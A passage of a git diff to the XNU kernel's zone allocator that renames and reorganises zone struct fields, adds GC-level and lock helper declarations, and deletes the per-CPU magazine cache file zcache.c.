uint16_t z_chunk_pages; /* size used for more memory in pages */ + uint16_t z_chunk_elems; /* count of allocations per chunk */ + uint16_t z_elems_rsv; /* maintain a free reserve of elements */ + uint16_t z_elem_size; /* size of an element */ uint64_t /* * Lifecycle state (Mutable after creation) */ - destroyed :1, /* zone is (being) destroyed */ - expanding_no_vm_priv:1, /* zone expanding via a non-vm_privileged thread */ - expanding_vm_priv :1, /* zone expanding via a vm_privileged thread */ - async_pending :1, /* asynchronous allocation pending? */ - waiting :1, /* is thread waiting for expansion? */ - zone_replenishing :1, + z_destroyed :1, /* zone is (being) destroyed */ + z_async_refilling :1, /* asynchronous allocation pending? */ + z_replenish_wait :1, /* someone is waiting on the replenish thread */ + z_expanding_wait :1, /* is thread waiting for expansion? */ + z_expander_vm_priv :1, /* a vm privileged thread is expanding */ /* * Security sensitive configuration bits */ - allows_foreign :1, /* allow non-zalloc space */ - destructible :1, /* zone can be zdestroy()ed */ + z_allows_foreign :1, /* allow non-zalloc space */ + z_destructible :1, /* zone can be zdestroy()ed */ kalloc_heap :2, /* zone_kheap_id_t when part of a kalloc heap */ - noencrypt :1, /* do not encrypt pages when hibernating */ - submap_idx :2, /* a Z_SUBMAP_IDX_* value */ - va_sequester :1, /* page sequester: no VA reuse with other zones */ - zfree_clear_mem :1, /* clear memory of elements on free and assert on alloc */ + z_noencrypt :1, /* do not encrypt pages when hibernating */ + z_submap_idx :2, /* a Z_SUBMAP_IDX_* value */ + z_va_sequester :1, /* page sequester: no VA reuse with other zones */ + z_free_zeroes :1, /* clear memory of elements on free and assert on alloc */ /* * Behavior configuration bits */ + z_percpu :1, /* the zone is percpu */ + z_permanent :1, /* the zone allocations are permanent */ + z_replenishes :1, /* uses the async replenish mechanism for VM */ + z_nocaching :1, /* disallow zone caching for this zone */ collectable :1, /* garbage collect empty pages */ - cpu_cache_enabled :1, - permanent :1, /* the zone allocations are permanent */ exhaustible :1, /* merely return if empty? */ expandable :1, /* expand zone (with message)? */ no_callout :1, - percpu :1, /* the zone is percpu */ _reserved :26, @@ -227,7 +210,20 @@ struct zone { * often mutated fields */ - decl_simple_lock_data(, lock); + lck_spin_t z_lock; + struct zone_depot z_recirc; + + /* + * Page accounting (wired / VA) + * + * Those numbers are unscaled for z_percpu zones + * (zone_scale_for_percpu() needs to be used to find the true value). + */ + uint32_t z_wired_max; /* how large can this zone grow */ + uint32_t z_wired_hwm; /* z_wired_cur high watermark */ + uint32_t z_wired_cur; /* number of pages used by this zone */ + uint32_t z_wired_empty; /* pages collectable by GC */ + uint32_t z_va_cur; /* amount of VA used by this zone */ /* * list of metadata structs, which maintain per-page free element lists @@ -235,17 +231,48 @@ struct zone { * Note: Due to the index packing in page metadata, * these pointers can't be at the beginning of the zone struct. */ - zone_pva_t pages_any_free_foreign; /* foreign pages crammed into zone */ - zone_pva_t pages_all_used_foreign; - zone_pva_t pages_all_free; - zone_pva_t pages_intermediate; - zone_pva_t pages_all_used; - zone_pva_t pages_sequester; /* sequestered pages - allocated VA with no populated pages */ - - uint32_t zp_count; /* counter for poisoning every N frees */ - uint32_t countfree; /* Number of free elements */ - uint32_t allfree_page_count; /* Number of pages collectable by GC */ - uint32_t sequester_page_count; + zone_pva_t z_pageq_empty; /* populated, completely empty pages */ + zone_pva_t z_pageq_partial;/* populated, partially filled pages */ + zone_pva_t z_pageq_full; /* populated, completely full pages */ + zone_pva_t z_pageq_va; /* non-populated VA pages */ + + /* + * Zone statistics + * + * z_contention_wma: + * weighted moving average of the number of contentions per second, + * in Z_CONTENTION_WMA_UNIT units (fixed point decimal). + * + * z_contention_cur: + * count of recorded contentions that will be fused in z_contention_wma + * at the next period. + * + * z_recirc_cur: + * number of magazines in the recirculation depot. + * + * z_elems_free: + * number of free elements in the zone. + * + * z_elems_{min,max}: + * tracks the low/high watermark of z_elems_free for the current + * weighted moving average period. + * + * z_elems_free_wss: + * weighted moving average of the (z_elems_free_max - z_elems_free_min) + * amplited which is used by the GC for trim operations. + * + * z_elems_avail: + * number of elements in the zone (at all). + */ +#define Z_CONTENTION_WMA_UNIT (1u << 8) + uint32_t z_contention_wma; + uint32_t z_contention_cur; + uint32_t z_recirc_cur; + uint32_t z_elems_free_max; + uint32_t z_elems_free_wss; + uint32_t z_elems_free_min; + uint32_t z_elems_free; /* Number of free elements */ + uint32_t z_elems_avail; /* Number of elements available */ #if CONFIG_ZLEAKS uint32_t zleak_capture; /* per-zone counter for capturing every N allocations */ @@ -254,7 +281,8 @@ struct zone { gzalloc_data_t gz; #endif #if KASAN_ZALLOC - vm_size_t kasan_redzone; + uint32_t z_kasan_redzone; + spl_t z_kasan_spl; #endif #if DEBUG || DEVELOPMENT || CONFIG_ZLEAKS /* zone logging structure to hold stacks and element references to those stacks. */ @@ -300,16 +328,33 @@ struct kheap_zones { }; extern zone_security_options_t zsecurity_options; -extern uint32_t _Atomic num_zones; +extern zone_id_t _Atomic num_zones; extern uint32_t zone_view_count; extern struct zone zone_array[]; -extern lck_grp_t zone_locks_grp; extern const char * const kalloc_heap_names[KHEAP_ID_COUNT]; +extern bool panic_include_zprint; +#if CONFIG_ZLEAKS +extern bool panic_include_ztrace; +extern struct ztrace *top_ztrace; +#endif +extern mach_memory_info_t *panic_kext_memory_info; +extern vm_size_t panic_kext_memory_size; +extern unsigned int zone_map_jetsam_limit; #define zone_index_foreach(i) \ - for (uint32_t i = 1, num_zones_##i = os_atomic_load(&num_zones, acquire); \ + for (zone_id_t i = 1, num_zones_##i = os_atomic_load(&num_zones, acquire); \ i < num_zones_##i; i++) +#define zone_foreach(z) \ + for (zone_t z = &zone_array[1], \ + last_zone_##z = &zone_array[os_atomic_load(&num_zones, acquire)]; \ + z < last_zone_##z; z++) + +struct zone_map_range { + vm_offset_t min_address; + vm_offset_t max_address; +} __attribute__((aligned(2 * sizeof(vm_offset_t)))); + __pure2 static inline vm_offset_t zone_elem_size(zone_t zone) @@ -320,7 +365,16 @@ zone_elem_size(zone_t zone) static inline uint32_t zone_count_allocated(zone_t zone) { - return zone->countavail - zone->countfree; + return zone->z_elems_avail - zone->z_elems_free; +} + +static inline vm_size_t +zone_scale_for_percpu(zone_t zone, vm_size_t size) +{ + if (zone->z_percpu) { + size *= zpercpu_count(); + } + return size; } static inline vm_size_t @@ -330,26 +384,29 @@ zone_size_wired(zone_t zone) * this either require the zone lock, * or to be used for statistics purposes only. */ - return ptoa(os_atomic_load(&zone->page_count, relaxed)); + vm_size_t size = ptoa(os_atomic_load(&zone->z_wired_cur, relaxed)); + return zone_scale_for_percpu(zone, size); } static inline vm_size_t zone_size_free(zone_t zone) { - return (vm_size_t)zone->pcpu_elem_size * zone->countfree; + return zone_scale_for_percpu(zone, + (vm_size_t)zone->z_elem_size * zone->z_elems_free); } static inline vm_size_t zone_size_allocated(zone_t zone) { - return (vm_size_t)zone->pcpu_elem_size * zone_count_allocated(zone); + return zone_scale_for_percpu(zone, + (vm_size_t)zone->z_elem_size * zone_count_allocated(zone)); } static inline vm_size_t zone_size_wasted(zone_t zone) { - return zone_size_wired(zone) - - (vm_size_t)zone->pcpu_elem_size * zone->countavail; + return zone_size_wired(zone) - zone_scale_for_percpu(zone, + (vm_size_t)zone->z_elem_size * zone->z_elems_avail); } /* @@ -359,15 +416,61 @@ zone_size_wasted(zone_t zone) */ extern uint64_t get_zones_collectable_bytes(void); -/* - * zone_gc also checks if the zone maps are getting close to full and triggers - * jetsams if needed, provided consider_jetsams is set to TRUE. +/*! + * @enum zone_gc_level_t + * + * @const ZONE_GC_TRIM + * Request a trimming GC: it will trim allocations in excess + * of the working set size estimate only. + * + * @const ZONE_GC_DRAIN + * Request a draining GC: this is an aggressive mode that will + * cause all caches to be drained and all free pages returned to the system. + * + * @const ZONE_GC_JETSAM + * Request to consider a jetsam, and then fallback to @c ZONE_GC_TRIM or + * @c ZONE_GC_DRAIN depending on the state of the zone map. + * To avoid deadlocks, only @c vm_pageout_garbage_collect() should ever + * request a @c ZONE_GC_JETSAM level. + */ +__enum_closed_decl(zone_gc_level_t, uint32_t, { + ZONE_GC_TRIM, + ZONE_GC_DRAIN, + ZONE_GC_JETSAM, +}); + +/*! + * @function zone_gc + * + * @brief + * Reduces memory used by zones by trimming caches and freelists. * - * To avoid deadlocks, we only pass a value of TRUE from within the - * vm_pageout_garbage_collect thread. + * @discussion + * @c zone_gc() is called: + * - by the pageout daemon when the system needs more free pages. + * - by the VM when contiguous page allocation requests get stuck + * (see vm_page_find_contiguous()). + * + * @param level The zone GC level requested. + */ +extern void zone_gc(zone_gc_level_t level); + +extern void zone_gc_trim(void); +extern void zone_gc_drain(void); + +#define ZONE_WSS_UPDATE_PERIOD 10 +/*! + * @function compute_zone_working_set_size + * + * @brief + * Recomputes the working set size for every zone + * + * @discussion + * This runs about every @c ZONE_WSS_UPDATE_PERIOD seconds (10), + * computing an exponential moving average with a weight of 75%, + * so that the history of the last minute is the dominating factor. */ -extern void zone_gc(boolean_t consider_jetsams); -extern void consider_zone_gc(boolean_t consider_jetsams); +extern void compute_zone_working_set_size(void *); /* Debug logging for zone-map-exhaustion jetsams. */ extern void get_zone_map_size(uint64_t *current_size, uint64_t *capacity); @@ -376,17 +479,25 @@ extern void get_largest_zone_info(char *zone_name, size_t zone_name_len, uin /* Bootstrap zone module (create zone zone) */ extern void zone_bootstrap(void); -/* +/*! + * @function zone_foreign_mem_init + * + * @brief * Steal memory from pmap (prior to initialization of zalloc) * for the special vm zones that allow foreign memory and store - * the range so as to facilitate range checking in zfree/zcram. + * the range so as to facilitate range checking in zfree. */ __startup_func -extern vm_offset_t zone_foreign_mem_init(vm_size_t size); +extern vm_offset_t zone_foreign_mem_init( + vm_size_t size); -/* - * Returns size (greater than min_pages) that is a multiple - * of the allocation granule for the zone. +/*! + * @function zone_get_foreign_alloc_size + * + * @brief + * Compute the correct size (greater than @c ptoa(min_pages)) that is a multiple + * of the allocation granule for the zone with the given creation flags and + * element size. */ __startup_func extern vm_size_t zone_get_foreign_alloc_size( @@ -395,6 +506,22 @@ extern vm_size_t zone_get_foreign_alloc_size( zone_create_flags_t flags, uint16_t min_pages); +/*! + * @function zone_cram_foreign + * + * @brief + * Cram memory allocated with @c zone_foreign_mem_init() into a zone. + * + * @param zone The zone to cram memory into. + * @param newmem The base address for the memory to cram. + * @param size The size of the memory to cram into the zone. + */ +__startup_func +extern void zone_cram_foreign( + zone_t zone, + vm_offset_t newmem, + vm_size_t size); + extern bool zone_maps_owned( vm_address_t addr, vm_size_t size); @@ -404,8 +531,8 @@ extern void zone_map_sizes( vm_map_size_t *pfree, vm_map_size_t *plargest_free); -extern boolean_t -is_zone_map_nearing_exhaustion(void); +extern bool +zone_map_nearing_exhaustion(void); #if defined(__LP64__) #define ZONE_POISON 0xdeadbeefdeadbeef @@ -413,12 +540,6 @@ is_zone_map_nearing_exhaustion(void); #define ZONE_POISON 0xdeadbeef #endif -/* - * Used by zalloc_direct_locked() and zcache to mark elements that have been - * cleared or poisoned and need to be checked. - */ -#define ZALLOC_ELEMENT_NEEDS_VALIDATION ((vm_offset_t)1) - static inline vm_tag_t zalloc_flags_get_tag(zalloc_flags_t flags) { @@ -428,54 +549,23 @@ zalloc_flags_get_tag(zalloc_flags_t flags) extern void *zalloc_ext( zone_t zone, zone_stats_t zstats, - zalloc_flags_t flags, - vm_size_t wasted); + zalloc_flags_t flags); extern void zfree_ext( zone_t zone, zone_stats_t zstats, void *addr); -/* free an element with no regard for gzalloc, zleaks, or kasan*/ -extern void zfree_direct_locked( - zone_t zone, - vm_offset_t elem, - bool poison); - -/* - * attempts to allocate an element with no regard for gzalloc, zleaks, or kasan - * returns an address possibly tagged with ZALLOC_ELEMENT_NEEDS_VALIDATION. +/*! + * @function zone_replenish_configure + * + * @brief + * Used by zones backing the VM to maintain a reserve of free elements. + * + * @discussion + * This function should not be used by anyone else than the VM. */ -extern vm_offset_t zalloc_direct_locked( - zone_t zone, - zalloc_flags_t flags, - vm_size_t waste); - -extern uint32_t zone_poison_count_init( - zone_t zone); - -extern bool zfree_clear_or_poison( - zone_t zone, - uint32_t *zp_count, - vm_address_t addr); - -extern void zone_clear_freelist_pointers( - zone_t zone, - vm_offset_t addr); - -#if ZALLOC_ENABLE_POISONING -extern void zalloc_validate_element( - zone_t zone, - vm_offset_t addr, - vm_size_t size, - bool validate); -#endif - -extern void zone_allocated_element_validate( - zone_t zone, - vm_offset_t addr); - -extern void zone_prio_refill_configure( +extern void zone_replenish_configure( zone_t zone); extern vm_size_t zone_element_size( @@ -526,8 +616,35 @@ extern uint32_t zone_index_from_tag_index( #endif /* VM_MAX_TAG_ZONES */ -#define lock_zone(zone) simple_lock(&(zone)->lock, &zone_locks_grp) -#define unlock_zone(zone) simple_unlock(&(zone)->lock) +static inline void +zone_lock(zone_t zone) +{ +#if KASAN_ZALLOC + spl_t s = 0; + if (zone->kasan_fakestacks) { + s = splsched(); + } +#endif /* KASAN_ZALLOC */ + lck_spin_lock(&zone->z_lock); +#if KASAN_ZALLOC + zone->z_kasan_spl = s; +#endif /* KASAN_ZALLOC */ +} + +static inline void +zone_unlock(zone_t zone) +{ +#if KASAN_ZALLOC + spl_t s = zone->z_kasan_spl; + zone->z_kasan_spl = 0; +#endif /* KASAN_ZALLOC */ + lck_spin_unlock(&zone->z_lock); +#if KASAN_ZALLOC + if (zone->kasan_fakestacks) { + splx(s); + } +#endif /* KASAN_ZALLOC */ +} #if CONFIG_GZALLOC void gzalloc_init(vm_size_t); diff --git a/osfmk/kern/zcache.c b/osfmk/kern/zcache.c deleted file mode 100644 index f0889994d..000000000 --- a/osfmk/kern/zcache.c +++ /dev/null @@ -1,698 +0,0 @@ -/* - * Copyright (c) 2017-2020 Apple Inc. All rights reserved. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ - * - * This file contains Original Code and/or Modifications of Original Code - * as defined in and that are subject to the Apple Public Source License - * Version 2.0 (the 'License'). You may not use this file except in - * compliance with the License. The rights granted to you under the License - * may not be used to create, or enable the creation or redistribution of, - * unlawful or unlicensed copies of an Apple operating system, or to - * circumvent, violate, or enable the circumvention or violation of, any - * terms of an Apple operating system software license agreement. - * - * Please obtain a copy of the License at - * http://www.opensource.apple.com/apsl/ and read it before using this file. - * - * The Original Code and all software distributed under the License are - * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER - * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, - * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. - * Please see the License for the specific language governing rights and - * limitations under the License. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ - */ - -#include -#include -#include -#include -#include -#include - -/* Size of array in magazine determined by boot-arg or default */ -TUNABLE(uint16_t, magazine_element_count, "zcc_magazine_element_count", 8); - -/* Size of depot lists determined by boot-arg or default */ -TUNABLE(uint16_t, depot_element_count, "zcc_depot_element_count", 8); - -SECURITY_READ_ONLY_LATE(zone_t) magazine_zone; /* zone to allocate zcc_magazine structs from */ -SECURITY_READ_ONLY_LATE(uintptr_t) zcache_canary; /* Canary used for the caching layer to prevent UaF attacks */ - -/* - * The zcc_magazine is used as a stack to store cached zone elements. These - * sets of elements can be moved around to perform bulk operations. - */ -struct zcc_magazine { - uint32_t zcc_magazine_index; /* Used as a stack pointer to acess elements in the array */ - uint32_t zcc_magazine_capacity; /* Number of pointers able to be stored in the zcc_elements array */ - vm_offset_t zcc_elements[0]; /* Array of pointers to objects */ -}; - - -/* - * Each CPU will use one of these to store its elements - */ -struct zcc_per_cpu_cache { - /* Magazine from which we will always try to allocate from and free to first */ - struct zcc_magazine *current; - /* Dedicated magazine for a quick reload and to prevent thrashing wen we swap with the depot */ - struct zcc_magazine *previous; - /* Zcache poisoning count */ - uint32_t zp_count; -#if ZALLOC_DETAILED_STATS - uint64_t zcc_allocs; - uint64_t zcc_frees; -#endif /* ZALLOC_DETAILED_STATS */ -}; - - -/* This is the basic struct to take care of cahing and is included within - * the zone. - */ -struct zcc_depot { - /* marks the point in the array where empty magazines begin */ - int zcc_depot_index; - -#if ZALLOC_DETAILED_STATS - uint64_t zcc_swap; - uint64_t zcc_fill; - uint64_t zcc_drain; - uint64_t zcc_fail; - uint64_t zcc_gc; -#endif /* ZALLOC_DETAILED_STATS */ - - /* Stores full and empty magazines in the depot layer */ - struct zcc_magazine *zcc_depot_list[0]; -}; - -static bool zcache_mag_fill_locked(zone_t zone, struct zcc_magazine *mag); -static void zcache_mag_drain_locked(zone_t zone, struct zcc_magazine *mag); -static bool zcache_mag_has_space(struct zcc_magazine *mag); -static bool zcache_mag_has_elements(struct zcc_magazine *mag); -static void zcache_swap_magazines(struct zcc_magazine **a, struct zcc_magazine **b); -static void zcache_mag_depot_swap_for_alloc(struct zcc_depot *depot, struct zcc_per_cpu_cache *cache); -static void zcache_mag_depot_swap_for_free(struct zcc_depot *depot, struct zcc_per_cpu_cache *cache); -static void zcache_canary_add(zone_t zone, vm_offset_t addr); -#if ZALLOC_ENABLE_POISONING -static void zcache_validate_element(zone_t zone, vm_offset_t *addr, bool poison); -static void zcache_validate_and_clear_canary(zone_t zone, vm_offset_t *primary, vm_offset_t *backup); -#endif - -/* - * zcache_ready - * - * Returns whether or not the zone caches are ready to use - * - */ -static bool -zcache_ready(void) -{ - return magazine_zone != NULL; -} - -/* - * zcache_bootstrap - * - * Initializes zone to allocate magazines from and sets - * magazine_element_count and depot_element_count from - * boot-args or default values - * - */ -__startup_func -static void -zcache_bootstrap(void) -{ - int magazine_size = sizeof(struct zcc_magazine) + magazine_element_count * sizeof(void *); - zone_t magzone; - - /* Generate the canary value for zone caches */ - zcache_canary = (uintptr_t) early_random(); - - magzone = zone_create("zcc_magazine_zone", magazine_size, - ZC_NOCACHING | ZC_ZFREE_CLEARMEM); - - /* - * This causes zcache_ready() to return true. - */ - os_atomic_store(&magazine_zone, magzone, compiler_acq_rel); - - /* - * Now that we are initialized, we can enable zone caching for zones that - * were made before zcache_bootstrap() was called. - * - * The system is still single threaded so we don't need to take the lock. - */ - zone_index_foreach(i) { - if (zone_array[i].cpu_cache_enabled) { - zcache_init(&zone_array[i]); - } - } -} -STARTUP(ZALLOC, STARTUP_RANK_FOURTH, zcache_bootstrap); - -static struct zcc_magazine * -zcache_mag_alloc(void) -{ - struct zcc_magazine *mag = zalloc_flags(magazine_zone, Z_WAITOK); - mag->zcc_magazine_capacity = magazine_element_count; - return mag; -} - - -/* - * zcache_init - * - * Initializes all parts of the per-cpu caches for a given zone - * - * Parameters: - * zone pointer to zone on which to iniitalize caching - * - */ -void -zcache_init(zone_t zone) -{ - struct zcc_per_cpu_cache *pcpu_caches; - struct zcc_depot *depot; - vm_size_t size; - - /* - * If zcache hasn't been initialized yet, remember our decision, - * - * zcache_init() will be called again by zcache_bootstrap(), - * while the system is still single threaded, to build the missing caches. - */ - if (!zcache_ready()) { - zone->cpu_cache_enabled = true; - return; - } - - /* Allocate chunk of memory for all structs */ - size = sizeof(struct zcc_depot) + (depot_element_count * sizeof(void *)); - depot = zalloc_permanent(size, ZALIGN_PTR); - - size = sizeof(struct zcc_per_cpu_cache); - pcpu_caches = zalloc_percpu_permanent(size, ZALIGN_PTR); - - /* Initialize a cache for every CPU */ - zpercpu_foreach(cache, pcpu_caches) { - cache->current = zcache_mag_alloc(); - cache->previous = zcache_mag_alloc(); - cache->zp_count = zone_poison_count_init(zone); - } - - /* Initialize empty magazines in the depot list */ - for (int i = 0; i < depot_element_count; i++) { - depot->zcc_depot_list[i] = zcache_mag_alloc(); - } - - lock_zone(zone); - if (zone->zcache.zcc_depot) { - panic("allocating caches for zone %s twice", zone->z_name); - } - - /* Make the initialization of the per-cpu magazines visible. */ - os_atomic_thread_fence(release); - - zone->zcache.zcc_depot = depot; - zone->zcache.zcc_pcpu = pcpu_caches; - zone->cpu_cache_enabled = true; - unlock_zone(zone); -} - -/* - * zcache_drain_depot - * - * Frees all the full magazines from the depot layer to the zone allocator as part - * of zone_gc(). The routine assumes that only one zone_gc() is in progress (zone_gc_lock - * ensures that) - * - * Parameters: - * zone pointer to zone for which the depot layer needs to be drained - * - * Returns: None - * - */ -void -zcache_drain_depot(zone_t zone) -{ - struct zcc_depot *depot; - int drain_depot_index = 0; - - lock_zone(zone); - depot = zone->zcache.zcc_depot; - drain_depot_index = depot->zcc_depot_index; - for (int i = 0; i < drain_depot_index; i++) { - zcache_mag_drain_locked(zone, depot->zcc_depot_list[i]); - } -#if ZALLOC_DETAILED_STATS - depot->zcc_gc += drain_depot_index; -#endif /* ZALLOC_DETAILED_STATS */ - depot->zcc_depot_index = 0; - unlock_zone(zone); -} - -__attribute__((noinline)) -static void -zcache_free_to_cpu_cache_slow(zone_t zone, struct zcc_per_cpu_cache *per_cpu_cache) -{ - struct zcc_depot *depot; - - lock_zone(zone); - depot = zone->zcache.zcc_depot; - if (depot->zcc_depot_index < depot_element_count) { - /* If able, rotate in a new empty magazine from the depot and retry */ - zcache_mag_depot_swap_for_free(depot, per_cpu_cache); - } else { - /* Free an entire magazine of elements */ - zcache_mag_drain_locked(zone, per_cpu_cache->current); -#if ZALLOC_DETAILED_STATS - depot->zcc_drain++; -#endif /* ZALLOC_DETAILED_STATS */ - } - unlock_zone(zone); -} - - -void -zcache_free_to_cpu_cache(zone_t zone, zone_stats_t zstats, vm_offset_t addr) -{ - struct zcc_per_cpu_cache *per_cpu_cache; - vm_offset_t elem = addr; - int cpu; - - zone_allocated_element_validate(zone, elem); - - /* - * This is racy but we don't need zp_count to be accurate. - * This allows us to do the poisoning with preemption enabled. - */ - per_cpu_cache = zpercpu_get(zone->zcache.zcc_pcpu); - if (zfree_clear_or_poison(zone, &per_cpu_cache->zp_count, elem)) { - addr |= ZALLOC_ELEMENT_NEEDS_VALIDATION; - } else { - zcache_canary_add(zone, elem); - } - -#if KASAN_ZALLOC - kasan_poison_range(elem, zone_elem_size(zone), ASAN_HEAP_FREED); -#endif - - disable_preemption(); - cpu = cpu_number(); - per_cpu_cache = zpercpu_get_cpu(zone->zcache.zcc_pcpu, cpu); - - if (zcache_mag_has_space(per_cpu_cache->current)) { - /* If able, free into current magazine */ - } else if (zcache_mag_has_space(per_cpu_cache->previous)) { - /* If able, swap current and previous magazine and retry */ - zcache_swap_magazines(&per_cpu_cache->previous, &per_cpu_cache->current); - } else { - zcache_free_to_cpu_cache_slow(zone, per_cpu_cache); - } - - struct zcc_magazine *mag = per_cpu_cache->current; - mag->zcc_elements[mag->zcc_magazine_index++] = addr; - zpercpu_get_cpu(zstats, cpu)->zs_mem_freed += zone_elem_size(zone); -#if ZALLOC_DETAILED_STATS - per_cpu_cache->zcc_frees++; -#endif /* ZALLOC_DETAILED_STATS */ - - enable_preemption(); -} - -__attribute__((noinline)) -static bool -zcache_alloc_from_cpu_cache_slow(zone_t zone, struct zcc_per_cpu_cache *per_cpu_cache) -{ - struct zcc_depot *depot; - - lock_zone(zone); - depot = zone->zcache.zcc_depot; - if (depot->zcc_depot_index > 0) { - /* If able, rotate in a full magazine from the depot */ - zcache_mag_depot_swap_for_alloc(depot, per_cpu_cache); - } else if (zcache_mag_fill_locked(zone, per_cpu_cache->current)) { -#if ZALLOC_DETAILED_STATS - depot->zcc_fill++; -#endif /* ZALLOC_DETAILED_STATS */ - } else { -#if ZALLOC_DETAILED_STATS - depot->zcc_fail++; -#endif /* ZALLOC_DETAILED_STATS */ - /* If unable to allocate from cache return NULL and fall through to zalloc */ - unlock_zone(zone); - enable_preemption(); - return false; - } - unlock_zone(zone); - - return true; -} - -vm_offset_t -zcache_alloc_from_cpu_cache(zone_t zone, zone_stats_t zstats, vm_size_t waste) -{ - struct zcc_per_cpu_cache *per_cpu_cache; - int cpu; - - disable_preemption(); - cpu = cpu_number(); - per_cpu_cache = zpercpu_get_cpu(zone->zcache.zcc_pcpu, cpu); - - if (zcache_mag_has_elements(per_cpu_cache->current)) { - /* If able, allocate from current magazine */ - } else if (zcache_mag_has_elements(per_cpu_cache->previous)) { - /* If able, swap current and previous magazine and retry */ - zcache_swap_magazines(&per_cpu_cache->previous, &per_cpu_cache->current); - } else if (!zcache_alloc_from_cpu_cache_slow(zone, per_cpu_cache)) { - return (vm_offset_t)NULL; - } - - struct zcc_magazine *mag = per_cpu_cache->current; - vm_offset_t elem_size = zone_elem_size(zone); - uint32_t index = --mag->zcc_magazine_index; - vm_offset_t addr = mag->zcc_elements[index]; - mag->zcc_elements[index] = 0; - zpercpu_get_cpu(zstats, cpu)->zs_mem_allocated += elem_size; -#if ZALLOC_DETAILED_STATS - if (waste) { - zpercpu_get_cpu(zstats, cpu)->zs_mem_wasted += waste; - } - per_cpu_cache->zcc_allocs++; -#else - (void)waste; -#endif /* ZALLOC_DETAILED_STATS */ - - enable_preemption(); - -#if ZALLOC_ENABLE_POISONING - bool validate = addr & ZALLOC_ELEMENT_NEEDS_VALIDATION; -#endif /* ZALLOC_ENABLE_POISONING */ - - addr &= ~ZALLOC_ELEMENT_NEEDS_VALIDATION; - -#if KASAN_ZALLOC - kasan_poison_range(addr, elem_size, ASAN_VALID); -#endif -#if ZALLOC_ENABLE_POISONING - if (!validate) { - vm_offset_t backup = addr + elem_size - sizeof(vm_offset_t); - zcache_validate_and_clear_canary(zone, (vm_offset_t *)addr, - (vm_offset_t *)backup); - } - zalloc_validate_element(zone, addr, elem_size, validate); -#endif /* ZALLOC_ENABLE_POISONING */ - - return addr; -} - - -/* - * zcache_mag_fill_locked - * - * Fills a magazine with as many elements as the zone can give - * without blocking to carve out more memory - * - * Parameters: - * zone zone from which to allocate - * mag pointer to magazine to fill - * - * Return: True if able to allocate elements, false is mag is still empty - */ -static bool -zcache_mag_fill_locked(zone_t zone, struct zcc_magazine *mag) -{ - uint32_t i = mag->zcc_magazine_index; - uint32_t end = mag->zcc_magazine_capacity; - vm_offset_t elem, addr; - - while (i < end && zone->countfree) { - addr = zalloc_direct_locked(zone, Z_NOWAIT, 0); - elem = addr & ~ZALLOC_ELEMENT_NEEDS_VALIDATION; - if (addr & ZALLOC_ELEMENT_NEEDS_VALIDATION) { - zone_clear_freelist_pointers(zone, elem); - } else { - zcache_canary_add(zone, elem); - } -#if KASAN_ZALLOC - kasan_poison_range(elem, zone_elem_size(zone), ASAN_HEAP_FREED); -#endif - mag->zcc_elements[i++] = addr; - } - - mag->zcc_magazine_index = i; - - return i != 0; -} - -/* - * zcache_mag_drain_locked - * - * Frees all elements in a magazine - * - * Parameters: - * zone zone to which elements will be freed - * mag pointer to magazine to empty - * - */ -static void -zcache_mag_drain_locked(zone_t zone, struct zcc_magazine *mag) -{ - vm_offset_t elem, addr; - bool poison; - - for (uint32_t i = 0, end = mag->zcc_magazine_index; i < end; i++) { - addr = mag->zcc_elements[i]; - poison = addr & ZALLOC_ELEMENT_NEEDS_VALIDATION; - elem = addr & ~ZALLOC_ELEMENT_NEEDS_VALIDATION; - -#if ZALLOC_ENABLE_POISONING - zcache_validate_element(zone, (vm_offset_t *)elem, poison); -#endif /* ZALLOC_ENABLE_POISONING */ - zfree_direct_locked(zone, elem, poison); - mag->zcc_elements[i] = 0; - } - mag->zcc_magazine_index = 0; -} - - -/* - * zcache_mag_has_space - * - * Checks if magazine still has capacity - * - * Parameters: - * mag pointer to magazine to check - * - * Returns: true if magazine is full - * - */ -static bool -zcache_mag_has_space(struct zcc_magazine *mag) -{ - return mag->zcc_magazine_index < mag->zcc_magazine_capacity; -} - - -/* - * zcache_mag_has_elements - * - * Checks if magazine is empty - * - * Parameters: - * mag pointer to magazine to check - * - * Returns: true if magazine has no elements - * - */ -static bool -zcache_mag_has_elements(struct zcc_magazine *mag) -{ - return mag->zcc_magazine_index > 0; -} - - -/* - * zcache_swap_magazines - * - * Function which swaps two pointers of any type - * - * Parameters: - * a pointer to first pointer - * b pointer to second pointer - */ -static void -zcache_swap_magazines(struct zcc_magazine **a, struct zcc_magazine **b) -{ - struct zcc_magazine *temp = *a; - *a = *b; - *b = temp; -} - - -/* - * zcache_mag_depot_swap_for_alloc - * - * Swaps a full magazine into the current position - * - * Parameters: - * depot pointer to the depot - * cache pointer to the current per-cpu cache - * - * Precondition: Check that the depot list has full elements - */ -static void -zcache_mag_depot_swap_for_alloc(struct zcc_depot *depot, struct zcc_per_cpu_cache *cache) -{ - /* Loads a full magazine from which we can allocate */ - assert(depot->zcc_depot_index > 0); - depot->zcc_depot_index--; -#if ZALLOC_DETAILED_STATS - depot->zcc_swap++; -#endif /* ZALLOC_DETAILED_STATS */ - zcache_swap_magazines(&cache->current, &depot->zcc_depot_list[depot->zcc_depot_index]); -} - - -/* - * zcache_mag_depot_swap_for_free - * - * Swaps an empty magazine into the current position - * - * Parameters: - * depot pointer to the depot - * cache pointer to the current per-cpu cache - * - * Precondition: Check that the depot list has empty elements - */ -static void -zcache_mag_depot_swap_for_free(struct zcc_depot *depot, struct zcc_per_cpu_cache *cache) -{ - /* Loads an empty magazine into which we can free */ - assert(depot->zcc_depot_index < depot_element_count); - zcache_swap_magazines(&cache->current, &depot->zcc_depot_list[depot->zcc_depot_index]); -#if ZALLOC_DETAILED_STATS - depot->zcc_swap++; -#endif /* ZALLOC_DETAILED_STATS */ - depot->zcc_depot_index++; -} - -/* - * zcache_canary_add - * - * Adds a canary to an element by putting zcache_canary at the first - * and last location of the element - * - * Parameters: - * zone zone for the element - * addr element address to add canary to - */ -static void -zcache_canary_add(zone_t zone, vm_offset_t element) -{ -#if ZALLOC_ENABLE_POISONING - vm_offset_t *primary = (vm_offset_t *)element; - vm_offset_t *backup = (vm_offset_t *)((vm_offset_t)primary + - zone_elem_size(zone) - 